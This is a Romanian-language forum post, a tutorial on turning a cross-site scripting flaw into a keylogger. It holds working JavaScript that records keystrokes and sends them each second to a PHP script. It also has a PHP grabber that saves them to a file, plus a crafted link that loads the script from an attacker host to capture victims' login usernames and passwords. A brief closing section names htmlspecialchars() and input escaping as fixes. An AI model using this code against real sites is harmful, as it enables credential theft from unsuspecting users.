Jump to content
c0unt3rlog1c

XSS Keylogger

Recommended Posts

Posted

Introductie

XSS este una din cele mai intalnite vulnerabilitati web, atacurile XSS sunt de obicei ignorate de administratorii care nu stiu in cat de multe moduri se poate exploata aceasta vulnerabilitate.

In acest tutorial va voi explica cum sa faceti un keylogger pe un site vulnerabil.

In cele mai multe cazuri, atacatorul fura cookieul victimei pentru ii accesa contul fara un username sau o parola.

Acum imaginati-va ca atacatorul are nevoie sa faca rost de usernameul sau parola victimei, pentru cauze ce nu trebuie explicate, in acest caz trebuie capturata fiecare tasta ce a fost scrisa pe pagina de login.

Javascript Keylogger

Codul de mai jos este un keylogger Javascript, el captureaza toate cuvintele scrise pe o pagina si le trimite remote unui script PHP odata la cateva secunde.

Schimbati localhost cu cu hostnameul serverului si locatia specifica.

var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://localhost/demo/keylogger.php?c='+keys;
keys = '';
}, 1000);

PHP Grabber

Codul de mai jos va primi si salva toate datele trimise de catre keylogger.

<?php
if(!empty($_GET['c'])) {
$logfile = fopen('data.txt', 'a+');
fwrite($logfile, $_GET['c']);
fclose($logfile);
}
?>

Exploatare

Acum atacatorul are ambele fisiere keylogger.php si keylogger.js pe un remote host.

El va trebui sa creeze un link infectat, precum acesta:

http://target/path/vulnpage.php?article=9<script src="http://attacker/keylogger/keylogger.js"></script>

Atacatorul poate trimite linkurile ca acesta victimei, daca victima nu observa URI-ul ciudat si se logheaza cu usernameul si parola, datele vor fi salvate in fisierul 'data.txt' pe serverul remote al atacatorului.

Protejare

Exista mai multe solutii pentru a fixa un cod vulnerabil la XSS.

  • Folositi-va de functia PHP htmlspecialchars(), care previne folosirea de caractere precum < ' / etc , transformandu-le in coduri html nefolositoare.
  • Nu trimiteti direct niciodata o variabila GET/POST/COOKIE, prin care atacatorul poate injecta coduri in pagina.

Asta a fost tot legat de subiectul xss keylogging, multumesc pentru ca ati citit.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...